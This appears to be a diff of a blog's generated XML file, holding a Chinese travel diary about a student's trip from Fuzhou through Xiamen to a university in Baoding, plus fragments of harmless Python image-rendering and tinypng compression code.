    l = np.array([lx,ly])
    m = np.array([mx,my])-l+1
    text_patch = text_arr[i][l[0]:l[0]+m[0],l[1]:l[1]+m[1]]

    # figure out padding:
    ext = canvas_sz - (l+m)
    num_pad = pad*np.ones(4,dtype='int32')
    num_pad[:2] = np.minimum(num_pad[:2], l)
    num_pad[2:] = np.minimum(num_pad[2:], ext)
    text_patch = np.pad(text_patch, pad_width=((num_pad[0],num_pad[2]), (num_pad[1],num_pad[3])), mode='constant')
    l -= num_pad[:2]

    w,h = text_patch.shape
    bg = bg_arr[l[0]:l[0]+w,l[1]:l[1]+h,:]

    # 使用方法 process 对文本进行着色处理,返回着色后的文本图像
    rdr0 = self.process(text_patch, bg, hs[i])
    rendered.append(rdr0)

    # 将着色后的文本图像放回到背景图像的相应位置
    bg_arr[l[0]:l[0]+w,l[1]:l[1]+h,:] = rdr0#rendered[-1]

    # 返回最终的背景图像
    """
    需要注意的是,当前代码中存在一个问题,即在 for 循环中的最后一行使用了 return,导致循环只执行一次。可能是由于代码缩进错误导致的。如果确实需要返回结果,则应将该行移动到 for 循环结束后再执行。
    """
    return bg_arr

    return bg_arr
    ]]>
    @@ -5212,7 +5212,7 @@ /posts/Diary-%E5%8F%88%E9%B9%AD%E4%BA%86%EF%BC%8C%E5%8F%88%E5%8F%88%E5%86%80%E4%BA%86/ - 前言
            

    ​ 暑假结束了!本着体验生活瞎折腾的目的,先从厦门玩两天再去学校嘻嘻嘻。

    正文

    8.10 购买机票

    jpg

    ​ 该买机票了。

    ​ 之前从福州飞石家庄觉得要经停,十分讨厌,于是试了试从厦门飞的路线。

    ​ 顺便再见见 LYY。

    ​ 本来想买 9.1 的票,结果结账的时候发现它涨价了,我不能接受!于是买了 9.3 的了,导师真好啊马上就同意了。喜提又摆烂两天!

    买了个周日的
    可以,那我就更有空了
    2 号不用上班

    8.15 酒店

    jpg

    ​ 刚好 LYY 也住机场附近,那我也订个机场附近的酒店。

    8.31 小插曲

    17:57 台风?

    这个台风太叼了,可能要宾馆蹲 2 天了
    湖雨辰全责
    湖雨霃
    还挺有文化的

    ​ 非常不幸地在旅程前遇到了台风……虽然说是冲广东去的但是闽南还是会暴雨。

    20:52 重买车票

    ​【12306】您购买的 9 月 1 日 D6315 次列车因故停运,需在 9 月 30 日前登录 12306 网站或到铁路车站按规定办理未乘区间退票手续,购买联程车票的,请于联程车票开车前一并办理退票,建议优先选择 12306 网站办理退票手续。

    ​ 台风居然真的把列车弄寄了?还好还能重买。估计这辆车开到广东,所以寄了查了下可能是开到漳州的缘故吧。

    ​【12306】购票成功,9 月 1 日 D6221 次,福州南站 11:46 开。

    ​ 这样一来去厦门的时间就更早了。

    D6221:

    • 11:40 福州南
    • 12:16 莆田
    • 12:45 泉州
    • 13:13 厦门北

    9.1 集美之旅

    09:47 出发

    jpg

    ​ 收拾收拾包准备出发了。

    10:01 西门站

    jpg

    ​ 刚好快要走的那段时间,地铁 4 号线开了。这样我家坐地铁就更方便了!

    ​ 跟父母到了个别。明年见!

    10:39 地铁 4 号线

    jpg

    ​ 导航说坐到东街口站直接转 1 号线去福州南站。但是上次发现地铁 1 号线比较挤还比较旧,所以决定多坐一会儿 4 号线绕到后面再转车。

    10:59 检票口

    jpg

    ​ 从地铁站到检票口大概需要 1 个小时,现在还有半个多小时的宽裕时间。

    11:40 上车了!

    jpg

    ​ 上车了!再见福州!

    12:47 泉州站

    jpg

    泉州站
    welcome to 泉州
    就当作泉州游了
    体会下赛泥木的故乡
    好家伙
    这泉州人还蛮有礼貌的
    那可不得

    13:46 十里长堤

    jpg

    ​ 下了动车直接坐地铁进岛内。跨海的地铁还是在海平面以上的。

    ​ 就当作打卡一下十里长堤。

    14:21 BRT 车站

    jpg

    ​ 下地铁转公交的过程中很坑很坑地坐过站了😅,结果公交车 1 站跑了好远,还是大雨,算了还是打车回宾馆吧。

    14:46 宾馆

    jpg

    ​ 宾馆外围很破旧,里面装修还过得去。鉴定为勉强能住。

    ​ 把行李一扔再出发了。

    ​ 抬手看手环不知道什么时候掉了,血亏🤒。

    14:54 闽南风格建筑

    jpg

    ​ 宾馆外面很有闽南风格的建筑。

    15:02 某口号

    jpg

    ​ 口号里写着要把厦门努力建设成一个高素质高颜值现代化国际化城市。

    15:09 高崎机场 T3

    jpg

    ​ 确定一下机场的大概方位,转地铁去第一站——集美学村!

    ​ 不得不说厦门的机场离市中心真的很近。

    15:51 集美学村

    jpg

    入侵集大
    哈哈哈这里面只有集大的几个老校区
    本部还在远处
    可惜了
    入侵失败

    15:54 嘉庚式建筑

    jpg

    ​ 这大概就是嘉庚式建筑了吧。

    16:10 石鼓路

    jpg jpg jpg jpg

    ​ 石鼓路原来就是个美食街……一个人出来玩也没有啥想吃好东西的欲望,于是拍了拍对面的歌词墙。

    ​ 这些歌曲在网易云里都搜不到,可惜了。

    16:25 集美中学

    jpg

    ​ 按照小红书的路线,该打卡到龙舟池和嘉庚中学了。

    16:29 嘉庚式建筑

    jpg

    ​ 整个中学里的学生都在这么个嘉庚式建筑里学习,有点牛蛙。

    16:31 龙舟池

    jpg

    ​ 有点干涸的龙舟池。

    16:35 南薰楼

    jpg

    ​ 陈嘉庚亲自主持兴建,楼高十五层,建筑面积 8105 平方米,1959 年落成,为当时福建省最高大楼。融合了中西建筑的特色和优点,乃集美学村标志性建筑之一。

    16:38 嘉庚公园

    jpg


    jpg jpg jpg jpg

    ​ 为了纪念陈嘉庚先生修的公园。看得出当时陈嘉庚真的好有钱,半个厦门都是他修的。

    ​ 纪念馆里没啥东西,大概就是介绍了下陈嘉庚的生平,是个开橡胶工厂的。

    ​ 不知道多年后,人们会怎么评价曹德旺呢?

    17:26 沙县小吃

    jpg

    ​ 下雨天真的难受,还不能骑车。

    ​ 找了家沙县小吃解决晚饭问题,价格还蛮实惠。发现扁肉在厦门里叫扁食,而扁肉在其它地方叫馄饨,扁肉还是福州特色词汇?

    ​ 最后坐公交车回去了,走了 2w9+ 步,一到宾馆洗完澡就躺尸了。

    ​ 晚上雨居然停了,血亏😥。

    9.2 思明之旅

    06:43 福

    等下厦大西村公交站碰个头?
    可以可以
    在 3 号线上了

    jpg

    ​ 坐厦门地铁居然能看到宣传福州的 MV《福》。

    06:56 厦门站

    jpg

    ​ 这天是个周六,LYY 放假了,于是开玩!

    ​ 计划是南普陀寺-中山公园-沙坡尾-环岛路-胡里山炮台-演武大桥观景台-躺尸。

    ​ 坐地铁转公交先。结果到厦门站这边给我整迷路了😅。

    ​ 为了过这个马路,走了天桥还进了 BRT 安检。

    07:03 梧村车站

    jpg

    ​ 就连一个公交车站都有好几个站台……同样是岛内,明显感受到思明区和湖里区的差距。

    ​ 思明区太拥挤了。我记得第一次来厦门的时候,也迷路了好几次😅。

    07:51 南普陀寺

    jpg

    ​ 与 LYY 回合,第一站——南普陀寺!

    ​ 第一次来厦门的时候去过南普陀寺门口。而 LYY 在厦门工作了一年多还从来没有来过这个地方,所以最后还是我带的路才进去的😅。

    ​ 南普陀寺说是要预约,结果根本没人查😅。

    07:54 双子塔

    jpg

    ​ 厦门标志性建筑——双子塔。

    07:56 颂恩楼

    jpg

    ​ 厦门标志性建筑——厦门大学颂恩楼。

    07:57 放生池

    jpg

    ​ 放生池里做不雅动作的龟龟。

    08:03 寺院内部

    jpg

    ​ 里面就是经典的寺庙内容了,佛像啊,四大金刚啊巴拉巴拉。规模要比万佛寺差得远。

    ​ 但是寺庙还是很精致的,上面的龙精确到胡须。

    ​ 在后面的普陀山估计因为天气原因封山了,寄!

    08:32 中山公园

    jpg

    ​ 第二站——中山公园!

    ​ 很多城市都有纪念孙中山先生的地标,厦门似乎特别多。

    08:36 中山像

    jpg

    ​ 孙中山先生像。

    ​ 后面大概就是个小公园了,适合老同志休闲。

    08:51 小动物园

    jpg

    ​ 中山公园里还有个小动物园,不过没啥动物就是了。

    09:17 沙坡尾

    jpg

    ​ 下一站——沙坡尾!结果来太早了艺术中心都还没开门😅。

    ​ 沿街随便走一走好了。

    ​ 走着走着要不接着下一站——八市。

    ​ 等车的时候有个老太太跟我们聊天,看 LYY 在厦门工作一年就比较高兴,说厦门是个好地方,可以早点来厦门买房迁户口什么的。看我是福州的就不理我了😅。

    09:48 安徽板面

    jpg

    ​ 在厦门,安徽 ber 面还是安徽的🧐。

    09:54 八市

    jpg

    这就是八市吗
    是的
    就是个海鲜市场我觉得
    这为啥也叫旅游景点
    不是菜市场?
    体验厦门日常生活吧

    ​ 八市,原来就是个菜市场啊……

    ​ 虽然不知道为啥这也能叫旅游景点,但是呢,确实有点小时候逛菜市场的感觉。

    10:01 BRT

    jpg

    ​ 体验一下 BRT,以公交车的方式来近似达到地铁的效果😲。

    ​ 本土鳖还以为跟公交车一样还要前门进后门出,其实都可以进出的。

    11:22 牛肉火锅

    jpg

    ​ 又一阵折腾,去吃了 LYY 推荐的自助牛肉火锅。

    ​ LYY 嫌弃我战斗力不行😅。

    12:30 一国两制沙滩

    jpg

    ​ 打车去一国两制沙滩。然后打算在环岛路一路骑车去胡里山炮台。

    12:36 黑人妈祖

    jpg

    ​ 不太能理解为什么这个妈祖像的脸是黑的。

    12:38 妈祖望金门

    jpg

    ​ 查了下地图,对面就是金门列岛了。

    12:44 手的雕塑

    jpg

    ​ 手包围的不知道是对岸的什么山丘。

    13:07 共享自行车

    jpg

    ​ 走了好久都没有找到共享单车,于是跟 LYY 提议要不要骑这种大车。

    ​ 结果这个车是真的难骑,差评!

    13:17 ei meng

    jpg

    ​ 椰风寨的厦门标签,上面还有闽南语的注音。

    13:31 卡住了!

    jpg

    ​ 这个大车真的坑,根本过不去,后来跟里面的保安商量了下把机动车的栅栏打开了才让我们过去了😅。

    13:54 曾厝垵

    jpg

    ​ 路过第一次去厦门被坑得不要不要的曾厝垵。

    14:21 胡里山炮台

    jpg

    ​ 骑到了胡里山炮台。花费 25 元开冲!

    14:26 大炮

    jpg

    ​ 买的纪念币上应该就是这门炮吧,叫世界古炮王。

    14:26 三子塔

    jpg

    ​ 又见双子塔。旁边的大厦有点挡视线了,看上去像三子塔😅。

    14:41 克虏伯大炮

    jpg

    ​ 这个是炮台上最大的炮了。

    14:42 漳州

    jpg

    ​ 到山顶了,看一看对岸的漳州。

    14:45 某口号

    jpg

    ​ 三民主义统一中国,于蒋经国总统时期,中华民国政府为解决中国问题而提出的政策目标与政治口号。继蒋中正总统时期的反攻大陆与七分政治、三分军事的政策后,1981 年蒋经国总统时期的对于中华人民共和国与中国共产党的政策。其彰显中华民国政府在动员戡乱时期由一开始的武力反攻,转向为政治反攻。

    ​ 在山顶遥远地看大担岛,居然还真能隐约地看到对岸的口号。

    ​ 把手机拉到最高倍数 70 倍,可以看到模模糊糊的八个字。可以可以,值回票价了😀。

    14:50 独木成林

    jpg

    ​ 一棵巨大的榕树。

    14:58 白城沙滩

    jpg

    ​ 最后一站——白城沙滩!

    15:32 发呆

    jpg

    ​ 在白城沙滩上望着对面的漳州发了会儿呆,想着这个暑假就要结束了,艰苦的生活就要开始了。

    ​ 本来打算在演武大桥观景台看日落的,但是时间太久了还是算了吧下次一定。

    15:41 郑成功像

    jpg

    ​ LYY 说他走不动了,不陪我玩了,于是打车回湖里了。他请我吃饭,我请他打车🧐。

    ​ 桥对岸就是鼓浪屿了,想起了上次跟本科舍友玩厦门,由于本科舍友经济条件不太好导致都没玩什么项目。

    ​ 后面呢,回 LYY 家参观了一会儿,还体验了一把带 AI 的 PS。LYY 因为思明区房价太贵,在湖里区租了个很小的房间,每天通勤都要花很长时间。又聊了聊工作和未来的事情,算是体验了下不同的生活。觉得自己其实还算幸运,读研还是工作,有所得就有所失吧。

    17:21 机场标识

    jpg

    ​ T3 候机楼标识,原来河北航都是要从 T3 走的。

    9.3 又又冀了

    03:02 睡不着

    jpg

    ​ 本来宾馆老板可以帮我免费送机的,要我 4:40 起床再联系他。可是我根本睡不着,很早就醒了。为了不打扰宾馆老板还是自己打车走了。

    03:16 T3 航站楼

    jpg

    ​ 结果来太早了,门都没开,我还以为机场都是 24 小时开门的呢😯。

    ​ 查了查发现要 5 点才开门。

    ​ 于是下象棋打发时间。

    04:56 排队中

    jpg

    ​ 感觉这个航站楼特别小特别挤。

    ​ 排队的时候已经感受到一些人很明显就是河北人了,比较壮,声音也比较尖🫤。

    05:07 机票

    jpg

    ​ 厦门航空的机票。

    05:50 结果还是要坐摆渡车

    jpg

    ​ 登机牌明明说是走廊桥的,结果又变卦,绝,还得坐摆渡车😅。

    ​ 不知道是福建还是河北的问题,感觉福建到河北往返的航班都不怎么受重视,估计是太冷门了吧。

    06:00 机场摆渡车

    jpg

    ​ 幸好我动作比较快,坐到了摆渡车的座位里。

    06:15 再见厦门!

    jpg

    ​ 再见厦门,再见福建!

    06:19 可爱的玩偶

    jpg

    这家伙,跟你走了不少地方啊

    ​ 上飞机了。

    ​ 考研时候买的可爱的玩偶,一直陪伴我的研究生生活到现在。

    07:08 望金门

    jpg

    ​ 特意选了一个靠右边窗户的座位,这样起飞的时候就可以拍到金门了!

    07:18 朝霞

    jpg

    ​ 窗外的朝霞。

    ​ 厦门飞石家庄不用经停真的蛮舒服的,就是前期比较波折。

    09:52 正定机场

    jpg

    ​ 下飞机了,托运的行李还等了好久才拿到……

    ​ 想试试坐高铁到保定的路线,先从 7 号口出门坐摆渡车去正定机场站。

    ​ 看我落单背着大包拿着行李,就有好多人看出我是学生,过来问我要不要打车,直接无视嘻嘻嘻。

    09:57 高铁站摆渡车

    jpg

    ​ 感觉坐高铁还挺麻烦😅,要不下次还是直接坐城际大巴去学校吧,emmm 反正都累。

    10:07 正定机场站

    jpg

    ​ 到了正定机场站,感觉内部装潢跟保定东站几乎一致。

    10:37 上车!

    jpg

    ​ 上动车了,没啥想拍照的欲望,继续下象棋打发时间了。

    11:20 下车!

    jpg

    ​ 下车!由于已经在这里坐过好几次动车,对这里已经很熟悉了。

    11:25 京畿之门

    jpg

    这个 b 地方
    成功回来

    ​ 再次甩掉一群搭讪问我要不要打车的人,直接上了公交。

    ​ 公交车车上都是要去学校的学生,司机嗓门大声音尖还骂骂咧咧的,真是熟悉的味道啊🤪。

    11:54 红叶

    jpg

    ​ 到冀大了。

    ​ 这段时间保定还蛮热的,但是冀大门口的树居然有些泛红了🤔。

    12:11 想你的风还是吹到了 654

    jpg

    ​ 顺利抵达。内心还算平静吧。

    ​ 我刚来宿舍澡堂就开始装修,得跑老远才能洗澡,歪撒女内。

    ​ 新开了家瑞幸,丫哦。

    ​ 实验室厕所门换新了,丫哦。

    ​ 电瓶车居然还能骑,丫哦,但是不让停在实验室楼下了,歪撒女内。

    ​ 工位有电了,丫哦。

    ​ 新装了共享单车,丫哦。

    ​ 新的一段生活开始了。

    ]]>
    + 前言
            

    ​ 暑假结束了!本着体验生活瞎折腾的目的,先从厦门玩两天再去学校嘻嘻嘻。

    正文

    8.10 购买机票

    jpg

    ​ 该买机票了。

    ​ 之前从福州飞石家庄觉得要经停,十分讨厌,于是试了试从厦门飞的路线。

    ​ 顺便再见见 LYY。

    ​ 本来想买 9.1 的票,结果结账的时候发现它涨价了,我不能接受!于是买了 9.3 的了,导师真好啊马上就同意了。喜提又摆烂两天!

    买了个周日的
    可以,那我就更有空了
    2 号不用上班

    8.15 酒店

    jpg

    ​ 刚好 LYY 也住机场附近,那我也订个机场附近的酒店。

    8.31 小插曲

    17:57 台风?

    这个台风太叼了,可能要宾馆蹲 2 天了
    湖雨辰全责
    湖雨霃
    还挺有文化的

    ​ 非常不幸地在旅程前遇到了台风……虽然说是冲广东去的但是闽南还是会暴雨。

    20:52 重买车票

    ​【12306】您购买的 9 月 1 日 D6315 次列车因故停运,需在 9 月 30 日前登录 12306 网站或到铁路车站按规定办理未乘区间退票手续,购买联程车票的,请于联程车票开车前一并办理退票,建议优先选择 12306 网站办理退票手续。

    ​ 台风居然真的把列车弄寄了?还好还能重买。估计这辆车开到广东,所以寄了查了下可能是开到漳州的缘故吧。

    ​【12306】购票成功,9 月 1 日 D6221 次,福州南站 11:46 开。

    ​ 这样一来去厦门的时间就更早了。

    D6221:

    • 11:40 福州南
    • 12:16 莆田
    • 12:45 泉州
    • 13:13 厦门北

    9.1 集美之旅

    09:47 出发

    jpg

    ​ 收拾收拾包准备出发了。

    10:01 西门站

    jpg

    ​ 刚好快要走的那段时间,地铁 4 号线开了。这样我家坐地铁就更方便了!

    ​ 跟父母到了个别。明年见!

    10:39 地铁 4 号线

    jpg

    ​ 导航说坐到东街口站直接转 1 号线去福州南站。但是上次发现地铁 1 号线比较挤还比较旧,所以决定多坐一会儿 4 号线绕到后面再转车。

    10:59 检票口

    jpg

    ​ 从地铁站到检票口大概需要 1 个小时,现在还有半个多小时的宽裕时间。

    11:40 上车了!

    jpg

    ​ 上车了!再见福州!

    12:47 泉州站

    jpg

    泉州站
    welcome to 泉州
    就当作泉州游了
    体会下赛泥木的故乡
    好家伙
    这泉州人还蛮有礼貌的
    那可不得

    13:46 十里长堤

    jpg

    ​ 下了动车直接坐地铁进岛内。跨海的地铁还是在海平面以上的。

    ​ 就当作打卡一下十里长堤。

    14:21 BRT 车站

    jpg

    ​ 下地铁转公交的过程中很坑很坑地坐过站了😅,结果公交车 1 站跑了好远,还是大雨,算了还是打车回宾馆吧。

    14:46 宾馆

    jpg

    ​ 宾馆外围很破旧,里面装修还过得去。鉴定为勉强能住。

    ​ 把行李一扔再出发了。

    ​ 抬手看手环不知道什么时候掉了,血亏🤒。

    14:54 闽南风格建筑

    jpg

    ​ 宾馆外面很有闽南风格的建筑。

    15:02 某口号

    jpg

    ​ 口号里写着要把厦门努力建设成一个高素质高颜值现代化国际化城市。

    15:09 高崎机场 T3

    jpg

    ​ 确定一下机场的大概方位,转地铁去第一站——集美学村!

    ​ 不得不说厦门的机场离市中心真的很近。

    15:51 集美学村

    jpg

    入侵集大
    哈哈哈这里面只有集大的几个老校区
    本部还在远处
    可惜了
    入侵失败

    15:54 嘉庚式建筑

    jpg

    ​ 这大概就是嘉庚式建筑了吧。

    16:10 石鼓路

    jpg jpg jpg jpg

    ​ 石鼓路原来就是个美食街……一个人出来玩也没有啥想吃好东西的欲望,于是拍了拍对面的歌词墙。

    ​ 这些歌曲在网易云里都搜不到,可惜了。

    16:25 集美中学

    jpg

    ​ 按照小红书的路线,该打卡到龙舟池和嘉庚中学了。

    16:29 嘉庚式建筑

    jpg

    ​ 整个中学里的学生都在这么个嘉庚式建筑里学习,有点牛蛙。

    16:31 龙舟池

    jpg

    ​ 有点干涸的龙舟池。

    16:35 南薰楼

    jpg

    ​ 陈嘉庚亲自主持兴建,楼高十五层,建筑面积 8105 平方米,1959 年落成,为当时福建省最高大楼。融合了中西建筑的特色和优点,乃集美学村标志性建筑之一。

    16:38 嘉庚公园

    jpg


    jpg jpg jpg jpg

    ​ 为了纪念陈嘉庚先生修的公园。看得出当时陈嘉庚真的好有钱,半个厦门都是他修的。

    ​ 纪念馆里没啥东西,大概就是介绍了下陈嘉庚的生平,是个开橡胶工厂的。

    ​ 不知道多年后,人们会怎么评价曹德旺呢?

    17:26 沙县小吃

    jpg

    ​ 下雨天真的难受,还不能骑车。

    ​ 找了家沙县小吃解决晚饭问题,价格还蛮实惠。发现扁肉在厦门里叫扁食,而扁肉在其它地方叫馄饨,扁肉还是福州特色词汇?

    ​ 最后坐公交车回去了,走了 2w9+ 步,一到宾馆洗完澡就躺尸了。

    ​ 晚上雨居然停了,血亏😥。

    9.2 思明之旅

    06:43 福

    等下厦大西村公交站碰个头?
    可以可以
    在 3 号线上了

    jpg

    ​ 坐厦门地铁居然能看到宣传福州的 MV《福》。

    06:56 厦门站

    jpg

    ​ 这天是个周六,LYY 放假了,于是开玩!

    ​ 计划是南普陀寺-中山公园-沙坡尾-环岛路-胡里山炮台-演武大桥观景台-躺尸。

    ​ 坐地铁转公交先。结果到厦门站这边给我整迷路了😅。

    ​ 为了过这个马路,走了天桥还进了 BRT 安检。

    07:03 梧村车站

    jpg

    ​ 就连一个公交车站都有好几个站台……同样是岛内,明显感受到思明区和湖里区的差距。

    ​ 思明区太拥挤了。我记得第一次来厦门的时候,也迷路了好几次😅。

    07:51 南普陀寺

    jpg

    ​ 与 LYY 回合,第一站——南普陀寺!

    ​ 第一次来厦门的时候去过南普陀寺门口。而 LYY 在厦门工作了一年多还从来没有来过这个地方,所以最后还是我带的路才进去的😅。

    ​ 南普陀寺说是要预约,结果根本没人查😅。

    07:54 双子塔

    jpg

    ​ 厦门标志性建筑——双子塔。

    07:56 颂恩楼

    jpg

    ​ 厦门标志性建筑——厦门大学颂恩楼。

    07:57 放生池

    jpg

    ​ 放生池里做不雅动作的龟龟。

    08:03 寺院内部

    jpg

    ​ 里面就是经典的寺庙内容了,佛像啊,四大金刚啊巴拉巴拉。规模要比万佛寺差得远。

    ​ 但是寺庙还是很精致的,上面的龙精确到胡须。

    ​ 在后面的普陀山估计因为天气原因封山了,寄!

    08:32 中山公园

    jpg

    ​ 第二站——中山公园!

    ​ 很多城市都有纪念孙中山先生的地标,厦门似乎特别多。

    08:36 中山像

    jpg

    ​ 孙中山先生像。

    ​ 后面大概就是个小公园了,适合老同志休闲。

    08:51 小动物园

    jpg

    ​ 中山公园里还有个小动物园,不过没啥动物就是了。

    09:17 沙坡尾

    jpg

    ​ 下一站——沙坡尾!结果来太早了艺术中心都还没开门😅。

    ​ 沿街随便走一走好了。

    ​ 走着走着要不接着下一站——八市。

    ​ 等车的时候有个老太太跟我们聊天,看 LYY 在厦门工作一年就比较高兴,说厦门是个好地方,可以早点来厦门买房迁户口什么的。看我是福州的就不理我了😅。

    09:48 安徽板面

    jpg

    ​ 在厦门,安徽 ber 面还是安徽的🧐。

    09:54 八市

    jpg

    这就是八市吗
    是的
    就是个海鲜市场我觉得
    这为啥也叫旅游景点
    不是菜市场?
    体验厦门日常生活吧

    ​ 八市,原来就是个菜市场啊……

    ​ 虽然不知道为啥这也能叫旅游景点,但是呢,确实有点小时候逛菜市场的感觉。

    10:01 BRT

    jpg

    ​ 体验一下 BRT,以公交车的方式来近似达到地铁的效果😲。

    ​ 本土鳖还以为跟公交车一样还要前门进后门出,其实都可以进出的。

    11:22 牛肉火锅

    jpg

    ​ 又一阵折腾,去吃了 LYY 推荐的自助牛肉火锅。

    ​ LYY 嫌弃我战斗力不行😅。

    12:30 一国两制沙滩

    jpg

    ​ 打车去一国两制沙滩。然后打算在环岛路一路骑车去胡里山炮台。

    12:36 黑人妈祖

    jpg

    ​ 不太能理解为什么这个妈祖像的脸是黑的。

    12:38 妈祖望金门

    jpg

    ​ 查了下地图,对面就是金门列岛了。

    12:44 手的雕塑

    jpg

    ​ 手包围的不知道是对岸的什么山丘。

    13:07 共享自行车

    jpg

    ​ 走了好久都没有找到共享单车,于是跟 LYY 提议要不要骑这种大车。

    ​ 结果这个车是真的难骑,差评!

    13:17 ei meng

    jpg

    ​ 椰风寨的厦门标签,上面还有闽南语的注音。

    13:31 卡住了!

    jpg

    ​ 这个大车真的坑,根本过不去,后来跟里面的保安商量了下把机动车的栅栏打开了才让我们过去了😅。

    13:54 曾厝垵

    jpg

    ​ 路过第一次去厦门被坑得不要不要的曾厝垵。

    14:21 胡里山炮台

    jpg

    ​ 骑到了胡里山炮台。花费 25 元开冲!

    14:26 大炮

    jpg

    ​ 买的纪念币上应该就是这门炮吧,叫世界古炮王。

    14:26 三子塔

    jpg

    ​ 又见双子塔。旁边的大厦有点挡视线了,看上去像三子塔😅。

    14:41 克虏伯大炮

    jpg

    ​ 这个是炮台上最大的炮了。

    14:42 漳州

    jpg

    ​ 到山顶了,看一看对岸的漳州。

    14:45 某口号

    jpg

    ​ 三民主义统一中国,于蒋经国总统时期,中华民国政府为解决中国问题而提出的政策目标与政治口号。继蒋中正总统时期的反攻大陆与七分政治、三分军事的政策后,1981 年蒋经国总统时期的对于中华人民共和国与中国共产党的政策。其彰显中华民国政府在动员戡乱时期由一开始的武力反攻,转向为政治反攻。

    ​ 在山顶遥远地看大担岛,居然还真能隐约地看到对岸的口号。

    ​ 把手机拉到最高倍数 70 倍,可以看到模模糊糊的八个字。可以可以,值回票价了😀。

    14:50 独木成林

    jpg

    ​ 一棵巨大的榕树。

    14:58 白城沙滩

    jpg

    ​ 最后一站——白城沙滩!

    15:32 发呆

    jpg

    ​ 在白城沙滩上望着对面的漳州发了会儿呆,想着这个暑假就要结束了,艰苦的生活就要开始了。

    ​ 本来打算在演武大桥观景台看日落的,但是时间太久了还是算了吧下次一定。

    15:41 郑成功像

    jpg

    ​ LYY 说他走不动了,不陪我玩了,于是打车回湖里了。他请我吃饭,我请他打车🧐。

    ​ 桥对岸就是鼓浪屿了,想起了上次跟本科舍友玩厦门,由于本科舍友经济条件不太好导致都没玩什么项目。

    ​ 后面呢,回 LYY 家参观了一会儿,还体验了一把带 AI 的 PS。LYY 因为思明区房价太贵,在湖里区租了个很小的房间,每天通勤都要花很长时间。又聊了聊工作和未来的事情,算是体验了下不同的生活。觉得自己其实还算幸运,读研还是工作,有所得就有所失吧。

    17:21 机场标识

    jpg

    ​ T3 候机楼标识,原来河北航都是要从 T3 走的。

    9.3 又又冀了

    03:02 睡不着

    jpg

    ​ 本来宾馆老板可以帮我免费送机的,要我 4:40 起床再联系他。可是我根本睡不着,很早就醒了。为了不打扰宾馆老板还是自己打车走了。

    03:16 T3 航站楼

    jpg

    ​ 结果来太早了,门都没开,我还以为机场都是 24 小时开门的呢😯。

    ​ 查了查发现要 5 点才开门。

    ​ 于是下象棋打发时间。

    04:56 排队中

    jpg

    ​ 感觉这个航站楼特别小特别挤。

    ​ 排队的时候已经感受到一些人很明显就是河北人了,比较壮,声音也比较尖🫤。

    05:07 机票

    jpg

    ​ 厦门航空的机票。

    05:50 结果还是要坐摆渡车

    jpg

    ​ 登机牌明明说是走廊桥的,结果又变卦,绝,还得坐摆渡车😅。

    ​ 不知道是福建还是河北的问题,感觉福建到河北往返的航班都不怎么受重视,估计是太冷门了吧。

    06:00 机场摆渡车

    jpg

    ​ 幸好我动作比较快,坐到了摆渡车的座位里。

    06:15 再见厦门!

    jpg

    ​ 再见厦门,再见福建!

    06:19 可爱的玩偶

    jpg

    这家伙,跟你走了不少地方啊

    ​ 上飞机了。

    ​ 考研时候买的可爱的玩偶,一直陪伴我的研究生生活到现在。

    07:08 望金门

    jpg

    ​ 特意选了一个靠右边窗户的座位,这样起飞的时候就可以拍到金门了!

    07:18 朝霞

    jpg

    ​ 窗外的朝霞。

    ​ 厦门飞石家庄不用经停真的蛮舒服的,就是前期比较波折。

    09:52 正定机场

    jpg

    ​ 下飞机了,托运的行李还等了好久才拿到……

    ​ 想试试坐高铁到保定的路线,先从 7 号口出门坐摆渡车去正定机场站。

    ​ 看我落单背着大包拿着行李,就有好多人看出我是学生,过来问我要不要打车,直接无视嘻嘻嘻。

    09:57 高铁站摆渡车

    jpg

    ​ 感觉坐高铁还挺麻烦😅,要不下次还是直接坐城际大巴去学校吧,emmm 反正都累。

    10:07 正定机场站

    jpg

    ​ 到了正定机场站,感觉内部装潢跟保定东站几乎一致。

    10:37 上车!

    jpg

    ​ 上动车了,没啥想拍照的欲望,继续下象棋打发时间了。

    11:20 下车!

    jpg

    ​ 下车!由于已经在这里坐过好几次动车,对这里已经很熟悉了。

    11:25 京畿之门

    jpg

    这个 b 地方
    成功回来

    ​ 再次甩掉一群搭讪问我要不要打车的人,直接上了公交。

    ​ 公交车车上都是要去学校的学生,司机嗓门大声音尖还骂骂咧咧的,真是熟悉的味道啊🤪。

    11:54 红叶

    jpg

    ​ 到冀大了。

    ​ 这段时间保定还蛮热的,但是冀大门口的树居然有些泛红了🤔。

    12:11 想你的风还是吹到了 654

    jpg

    ​ 顺利抵达。内心还算平静吧。

    ​ 我刚来宿舍澡堂就开始装修,得跑老远才能洗澡,歪撒女内。

    ​ 新开了家瑞幸,丫哦。

    ​ 实验室厕所门换新了,丫哦。

    ​ 电瓶车居然还能骑,丫哦,但是不让停在实验室楼下了,歪撒女内。

    ​ 工位有电了,丫哦。

    ​ 新装了共享单车,丫哦。

    ​ 新的一段生活开始了。

    ]]>
    @@ -5268,7 +5268,7 @@ /posts/Diary-%E6%9A%91%E6%9C%9F%E5%9B%BE%E9%9B%86%EF%BC%887%20%E6%9C%88%EF%BC%89/ - 前言

    批量 tinypng 代码:

    import os
    import tinify

    tinify.key = "XXX"
    def get_all_files_in_folder(folder_path):
    files = []
    for root, dirs, filenames in os.walk(folder_path):
    for filename in filenames:
    file_path = os.path.join(root, filename)
    files.append(file_path)
    return files

    folder_path = r'D:\...' # 替换为你要遍历的文件夹路径
    file_list = get_all_files_in_folder(folder_path)
    for file in file_list:
    source = tinify.from_file(file)
    source.to_file(file)
    print(file, "finished.")
    print("All finished!")

    正文

    7.2 FJNU

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    7.4 东街口、乌山、洪塘大桥

    jpg


    jpg


    jpg

    7.10 协和学院

    jpg

    7.12 FJUT

    jpg jpg jpg

    7.19-7.23 武汉

    png

    7.27 跟小迷糊逛 FJNU

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    7.29 永嘉天地

    jpg jpg jpg

    jpg


    jpg

    ]]>
    + 前言

    批量 tinypng 代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    import os
    import tinify

    tinify.key = "XXX"
    def get_all_files_in_folder(folder_path):
    files = []
    for root, dirs, filenames in os.walk(folder_path):
    for filename in filenames:
    file_path = os.path.join(root, filename)
    files.append(file_path)
    return files

    folder_path = r'D:\...' # 替换为你要遍历的文件夹路径
    file_list = get_all_files_in_folder(folder_path)
    for file in file_list:
    source = tinify.from_file(file)
    source.to_file(file)
    print(file, "finished.")
    print("All finished!")

    正文

